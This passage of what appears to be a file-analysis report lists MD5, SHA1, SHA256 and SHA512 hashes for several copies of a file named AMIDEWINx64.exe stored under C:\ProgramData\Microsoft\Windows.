| SHA512 | c7937bc2396b355339c5d4582d53b83ec71483c897228912bbad148efd6bda8ef1036eff721523ccb855bf4cb79343ac29b3555e7d95a38c618e28b442622896 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 890ea78b2c1e46650c977fa1ffd959cf |
| SHA1 | d9601c0c2fce9f30ec891a94e38dc9bfe6c85050 |
| SHA256 | a597f05750378934c26a2f2bdb85322e062d9c8e428696306cb89a191297d02e |
| SHA512 | bce4938b1df48ba09981a23afdb560fca46a5f9a15a6b37a4fc8d8187ea2bac3d2fc5f3b35e822e57ce2b341b601c296bb8733d9cdafc7a267618e2ed5bd6051 |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 59551a0f7f35ee3f0a9157c14d8733ec |
| SHA1 | 43bea2ec74d436454fe91a7e64ada0ad9f271ff5 |
| SHA256 | 86fb3f800e2a4fdf89da7241b65acbec64417f7b5af230d3f036c5d06f5de480 |
| SHA512 | 5ba90e7f9ba166934d02acffb9dd7dc4d95c8b0b7234ebe92fff0ba8850ee02682e3efd0900183c31a03e171ac19f441da57a20f840d140bd675eea0cce59d1d |
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
| MD5 | 12919d0cf021aa13360463e872b43aae |
| SHA1 | 83766767ef21045edd2f171774b66828831ba3e2 |
| SHA256 | 2a02ce9df008046c76a0073b434566cec1a1bbe3eb40a15da6ca6db320922c1c |
| SHA512 | 778f44dc1f928d7ca910afa6f0d9381d7bdee2f4a06180265c10129d4d1cb8e5de31836763ce3873a2ad54b3e8f81b17da7657bf482189b0b218a4c1d95ad267 |